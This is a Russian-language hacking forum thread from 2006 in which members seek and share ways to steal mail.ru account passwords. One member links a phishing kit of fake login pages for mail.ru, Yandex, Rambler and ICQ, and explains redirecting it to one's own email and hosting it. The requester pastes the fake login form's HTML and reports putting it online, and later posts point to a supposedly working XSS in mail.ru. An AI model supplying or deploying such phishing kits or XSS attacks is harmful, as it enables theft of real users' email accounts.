нужна активная XSS в почте mail.ru

Discussion in 'Уязвимости Mail-сервисов' started by qwert125, 5 Nov 2006.

  1. qwert125

    qwert125 New Member

    Joined:
    30 Oct 2006
    Messages:
    16
    Likes Received:
    1
    Reputations:
    0
    Подскажите скрипт который можно было бы отправить по мылу при открытии которого жертву перебрасывало бы на мою страничку клон-страницы которую выдает mail.ru ри вводе не правильного пароля
    и скрипт для этой странички чтобы заново введеные данные отправлялись мне на мыло
    Наверняка кто нибудь такое делал
     
  2. porter

    porter Banned

    Joined:
    1 Mar 2005
    Messages:
    58
    Likes Received:
    9
    Reputations:
    1
    Врятли тебе такое напишут....
    Максимум что ты можешь сделать так это самому такое сварганить либо купить этот скрипт..
     
  3. qwert125

    qwert125 New Member

    Joined:
    30 Oct 2006
    Messages:
    16
    Likes Received:
    1
    Reputations:
    0
    так зачем же писать,может у кого уже есть готовое?
     
  4. Undernative

    Undernative DesigneR

    Joined:
    16 May 2006
    Messages:
    325
    Likes Received:
    272
    Reputations:
    14
    http://dump.ru/files/8/8651969201/

    Мои фейковые страница для
    -mail.ru
    -yandex.ru
    -rambler.ru
    -ICQ

    в файле form.php смени мыло вместо beast-6@*****.ru на свое...и сливай все содержимое на домены holm.ru там лучше всего пашет

    А на счет отправки письма используй либо Outlook ,в нем юзай гиперссылку чтобы скрыть ссылку ,либо пиши скрипт,его я не могу тебе написать.Ибо это сделай сам.
     
  5. nc.STRIEM

    nc.STRIEM Members of Antichat

    Joined:
    5 Apr 2006
    Messages:
    1,036
    Likes Received:
    347
    Reputations:
    292
    Это те нужна активная XSS в почте mail.ru! Такие вещи всегдща есть, но те которые попадают в паблик долго не живут! поэтому кто знает тот молчит! хотя за деньги скажут))
     
  6. porter

    porter Banned

    Joined:
    1 Mar 2005
    Messages:
    58
    Likes Received:
    9
    Reputations:
    1
    nc.STRIEM сам знаешь?
     
  7. qwert125

    qwert125 New Member

    Joined:
    30 Oct 2006
    Messages:
    16
    Likes Received:
    1
    Reputations:
    0
    че то я в файле form.php не нашел beast-6@*****.ru
    PHP:
    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">  <!-- saved from url=(0073)http://lineage2world.jino-net.ru/-%20Lineage2World_com%20-_files/form.php -->  <HTML><HEAD>  <META http-equiv=Content-Type content="text/html; charset=windows-1251"><LINK   href="form.files/dubie.css" type=text/css rel=stylesheet>  <META content="MSHTML 6.00.2800.1106" name=GENERATOR></HEAD>  <BODY style="FONT-SIZE: 15px; FONT-FAMILY: Verdna" bgColor=#ffffff leftMargin=0   topMargin=0>  <FORM action=send.php method=post>  <P>Логин :&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <INPUT size=30 name=Name><tr><td class=form width=100%>  <td><select size=1 name=Domain class=long tabindex=2>  <option value=mail.ru >@mail.ru</option><option value=inbox.ru >@inbox.ru</option><option value=bk.ru >@bk.ru</option><option value=list.ru >@list.ru</option>  </select></td>  </table>  </td>  </tr></P>  <P>Пароль:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <INPUT type=password   size=30 name=Email></P>  <BR><BR>  <CENTER><INPUT type=submit value=Войти> </CENTER></FORM></BODY></HTML>  

    а потом, я то залью mail.htm а form.php куда заливать то? :(
     
  8. Fixer

    Fixer New Member

    Joined:
    30 Oct 2006
    Messages:
    2
    Likes Received:
    2
    Reputations:
    1
    тебе сюда! http://forum.antichat.ru/threadedpost217073.html#post217073
     
  9. Undernative

    Undernative DesigneR

    Joined:
    16 May 2006
    Messages:
    325
    Likes Received:
    272
    Reputations:
    14
    1.CОрри напутал...в файле send.php
    2.Допустим папка mail.ru ,все что в ней есть сливай на хост и все
     
  10. qwert125

    qwert125 New Member

    Joined:
    30 Oct 2006
    Messages:
    16
    Likes Received:
    1
    Reputations:
    0
    За то я нашел в файле send.php [email protected] поменял его на свой и все содержимое папки залил на holm.ru но ни хера не получается,правда я страницу mail.htm свою залил,потому как в твоей три орфографические ошибки,не знаю на сколько это важно...
     
  11. qwert125

    qwert125 New Member

    Joined:
    30 Oct 2006
    Messages:
    16
    Likes Received:
    1
    Reputations:
    0
    Вот посмотри http://qwert125.h17.ru/mail.htm
     
  12. Undernative

    Undernative DesigneR

    Joined:
    16 May 2006
    Messages:
    325
    Likes Received:
    272
    Reputations:
    14
    пиши в ПМ !
     
  13. qwert125

    qwert125 New Member

    Joined:
    30 Oct 2006
    Messages:
    16
    Likes Received:
    1
    Reputations:
    0
    ...а что такое ПМ?
     
    1 person likes this.
  14. ZikZak

    ZikZak Elder - Старейшина

    Joined:
    27 Jul 2006
    Messages:
    218
    Likes Received:
    115
    Reputations:
    3
    Улыбнуло )))
    ПМ - это Персональное Сообщение
     
  15. ENFIX

    ENFIX Elder - Старейшина

    Joined:
    6 Jun 2006
    Messages:
    175
    Likes Received:
    122
    Reputations:
    75
    Вот люди пошли... Xss им нада, а даже не знаю что такое ПМ...
    Наверно просто причли, что Xss это круто и с ним все можно :-d
     
  16. Chumak

    Chumak Elder - Старейшина

    Joined:
    27 Oct 2006
    Messages:
    59
    Likes Received:
    7
    Reputations:
    -4
    Плиз вышлите кто нить в ПМ!!! Пажалуйста!
     
  17. qwert125

    qwert125 New Member

    Joined:
    30 Oct 2006
    Messages:
    16
    Likes Received:
    1
    Reputations:
    0
    Chumak че выслать то?
     
  18. Chumak

    Chumak Elder - Старейшина

    Joined:
    27 Oct 2006
    Messages:
    59
    Likes Received:
    7
    Reputations:
    -4
    Активную xss!
     
  19. Undernative

    Undernative DesigneR

    Joined:
    16 May 2006
    Messages:
    325
    Likes Received:
    272
    Reputations:
    14
    :D :D :D
     
    2 people like this.
  20. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    http://forum.antichat.ru/showthread.php?t=26862 вот тут все смотрите - свежак рабочий
    Можно затестить http://otvet.mail.ru/question/961034/